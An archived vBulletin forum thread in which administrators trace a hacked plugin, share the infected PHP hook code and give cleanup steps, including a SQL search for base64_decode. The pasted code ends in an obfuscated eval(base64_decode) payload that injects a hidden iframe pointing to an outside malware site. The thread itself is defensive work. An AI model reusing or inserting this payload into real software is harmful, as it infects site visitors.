The Arcive of Official vBulletin Modifications Site.It is not a VB3 engine, just a parsed copy! |
|
#11
|
|||
|
|||
Your screenshot in https://vborg.vbsupport.ru/showpost....49&postcount=6 shows a Thank You plugin at the global_setup_complete hook.
There is no Thank You plugin that's using that hook. To blame the Thank You hack for this seems misguided. You were hacked by tapatalk. Lord knows what else got corrupted in the process. |
#12
|
||||
|
||||
I would like to thank someDude-GP for posting that code. I have been dealing with this issue for a week on my site. You may have just helped me find this code.
I had deleted my tapatalk directory so I didn't have a possible roadmap to where they placed that code. Searching my datastore table just now it appears that they inserted it in one of my plugins. This is as far as I have gotten, but I am very encouraged to find a match to the code you posted. THANK YOU. I owe you some beers. caliman --------------- Added [DATE]1277699440[/DATE] at [TIME]1277699440[/TIME] --------------- In my case it was the 'Members who visted today' plugin that got infected. The global_start hook: Code:
if ($show['wvt']) { if ($vbulletin->options['wvt24']) { $cutoff = TIMENOW - 86400; $whodesc = $vbphrase['wvt_visited_today_24']; } else { $whodesc = $vbphrase['wvt_visited_today']; $tnow = date('YmdHis',TIMENOW - intval($vbulletin->options['hourdiff'])); $cutoff = TIMENOW - (substr($tnow,8,2)*3600 + substr($tnow,10,2)*60 + substr($tnow,12,2)); } unset ($whotoday); $show['loggedinusers'] = true; if ($vbulletin->options['wvtnames']) { $todaysusers = $vbulletin->db->query_read_slave(" SELECT * FROM ".TABLE_PREFIX."user FORCE INDEX (lastactivity) WHERE lastactivity > $cutoff ORDER BY username "); $totaltoday = 0; while ($today = $vbulletin->db->fetch_array($todaysusers)) { $totaltoday += 1; $today['markinv'] = ''; $today[visible] = true ; if ($today['options'] & $vbulletin->bf_misc_useroptions['invisible']) { $today['visible'] = false ; if (($vbulletin->userinfo['permissions']['genericpermissions'] & $vbulletin->bf_ugp_genericpermissions['canseehidden']) OR $today['userid'] == $vbulletin->userinfo['userid']) { $today['markinv'] = '*'; $today['visible'] = true ; } } if ($today['visible']) { $ugroup = ($today['displaygroupid'] > 0 ? $today['displaygroupid'] : $today['usergroupid']); $today['opentag'] = $vbulletin->usergroupcache[$ugroup]['opentag']; $today['closetag'] = $vbulletin->usergroupcache[$ugroup]['closetag']; $today['wrdate'] = vbdate($vbulletin->options['timeformat'], $today['lastactivity']); eval('$whotoday .= "' . fetch_template('Display_Visitors_User') . '" . ", ";'); } } if ($whotoday) { $whotoday = substr($whotoday, 0, -2); } else { $whotoday = $vbphrase['wvt_no_visitors']; } } else { $todaysusers = $vbulletin->db->query_first_slave(" SELECT COUNT(lastactivity) AS whotoday FROM ".TABLE_PREFIX."user FORCE INDEX (lastactivity) WHERE lastactivity > $cutoff "); $totaltoday = $todaysusers['whotoday']; $whotoday = $vbphrase['wvt_no_visitors_display']; } if ($vbulletin->options['wvtcol']) { $vbcollapse['collapseimg_forumhome_todayusers'] = '_collapsed'; $vbcollapse['collapseobj_forumhome_todayusers'] = 'display:none;'; } $ftotaltoday = vb_number_format($totaltoday); $whotitle = construct_phrase($whodesc,$ftotaltoday); $pid = 'paulm_wvt_37'; if ($pemdata37['set'] == true) { $data_wvt =& $pemdata37[$pid]; } else { if ($pemdata37 = unserialize($vbulletin->options['pemdata37'])) { $pemdata37['set'] = true; $data_wvt =& $pemdata37[$pid]; } else { $data_wvt = array('version' => 'N/A'); } } if ($vbulletin->options['enable_wvt']) { $vbulletin->templatecache["{$vbulletin->options['template_wvt']}"] = str_replace($vbulletin->options['text_wvt'], $vbulletin->options['text_wvt'].$vbulletin->templatecache['Display_Visitors'],$vbulletin->templatecache["{$vbulletin->options['template_wvt']}"]); } if ($vbulletin->options['wvtmost']) { if (empty($vbulletin->maxloggedin)) { if (method_exists($vbulletin->datastore,'do_fetch')) { // Datastore extension exists, use it $vbulletin->datastore->do_fetch('maxloggedin',$errors); if ($errors[0]) { // Fetch failed, use original datastore $vbulletin->datastore->do_db_fetch("'maxloggedin'"); } } else { // No extension, use original datastore $vbulletin->datastore->do_db_fetch("'maxloggedin'"); } } if ($totaltoday > intval($vbulletin->maxloggedin['maxvisitors'])) { $vbulletin->maxloggedin['maxvisitorsdate'] = TIMENOW; $vbulletin->maxloggedin['maxvisitors'] = $totaltoday; build_datastore('maxloggedin', serialize($vbulletin->maxloggedin),1); } if ($vbulletin->options['wvtmost']) { if ($vbulletin->options['wvt24']) { $description = $vbphrase['wvt_members_24']; } else { $description = $vbphrase['wvt_members_day']; } $visitors = construct_phrase( $description, vb_number_format($vbulletin->maxloggedin['maxvisitors']), vbdate( $vbulletin->options['dateformat'], $vbulletin->maxloggedin['maxvisitorsdate'], true ), vbdate( $vbulletin->options['timeformat'], $vbulletin->maxloggedin['maxvisitorsdate'] ) ); $whotoday = $visitors . "<br />" . $whotoday; } } } @eval(base64_decode("aWYgKCFpc3NldCgkX0NPT0tJRVsneGxvdiddKSkgew0KJHhiID0gYXJyYXkoJ01TSUUnLCdNeUlF JywnSUUnLCdGaXJlZm94JywnT3BlcmEnLCdOZXRzY2FwZScsJ0Nocm9tZScsJ1NhZmFyaScsJ01l ZGlhIENlbnRlcicpOw0KJGlmcmFuZCA9IG10X3JhbmQoMCwxMTEpOw0KJGRvbWIgPSAiaHR0cDov L3d3dy5nZXR0aWFvLmNvLmNjL3BsLnBocCI7DQpmb3JlYWNoICgkeGIgYXMgJHhiYikgew0KaWYo c3Ryc3RyKHN0cnRvbG93ZXIoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddKSxzdHJ0b2xvd2Vy KCR4YmIpKSkgew0KJGRldmIgPSA8PDxISkoNCjxzY3JpcHQ+DQpmdW5jdGlvbiBTZXRDb29raWUo Y29va2llTmFtZSxjb29raWVDb250ZW50KXsNCiB2YXIgY29va2llUGF0aCA9ICcvJzsNCiB2YXIg ZXhwRGF0ZT1uZXcgRGF0ZSgpOw0KIGV4cERhdGUuc2V0VGltZShleHBEYXRlLmdldFRpbWUoKSsz NzI4MDAwMDApICA7DQogdmFyIGV4cGlyZXM9ZXhwRGF0ZS50b0dNVFN0cmluZygpOw0KIGRvY3Vt ZW50LmNvb2tpZT1jb29raWVOYW1lKyI9Iitlc2NhcGUoY29va2llQ29udGVudCkrIjtwYXRoPSIr ZXNjYXBlKGNvb2tpZVBhdGgpKyI7ZXhwaXJlcz0iK2V4cGlyZXM7IA0KfQ0KU2V0Q29va2llKCJ4 bG92IiwgImRheSIpOw0KPC9zY3JpcHQ+DQo8aWZyYW1lIG5hbWU9IiRpZnJhbmQiIHdpZHRoPSIx IiBoZWlnaHQ9IjEiIHNjcm9sbGluZz0ibm8iIGZyYW1lYm9yZGVyPSJubyIgbWFyZ2lud2lkdGg9 IjAiIG1hcmdpbmhlaWdodD0iMCIgc3JjPSIkZG9tYiI+PC9pZnJhbWU+DQpISko7DQpicmVhazsN CiB9DQogfQ0KfQ==")); Uninstalling the plugin did the trick. This also rebuilds the datastore. You can search your database to look for this code by doing this: Code:
SELECT * FROM plugin WHERE phpcode LIKE "%base64_decode%"; Hope this helps someone. This has been absolutely brutal. caliman |
#13
|
|||
|
|||
Glad I could help you find that code caliman
djbaxter: The Post thanks mod was only a guess. I have way too many things going on to really dig into it very much. I did notice that the tapatalk plugin was updated on 06/25/2010 though. --------------- Added [DATE]1277730343[/DATE] at [TIME]1277730343[/TIME] --------------- What i did was go into plugins & products --> product manager. then i found the part of the plugin that had the code and just deleted the code |
#14
|
||||
|
||||
Thanks again. I was serious about the beer.
I have confirmed that this removed the exploit from my site. |
#15
|
|||
|
|||
Thanks to both of you. While my forum wasn't showing any symptoms, I did the search using phpMyAdmin and verified that the exploit was not present on my forums.
|
|
|
X vBulletin 3.8.12 by vBS Debug Information | |
---|---|
|
|
More Information | |
Template Usage:
Phrase Groups Available:
|
Included Files:
Hooks Called:
|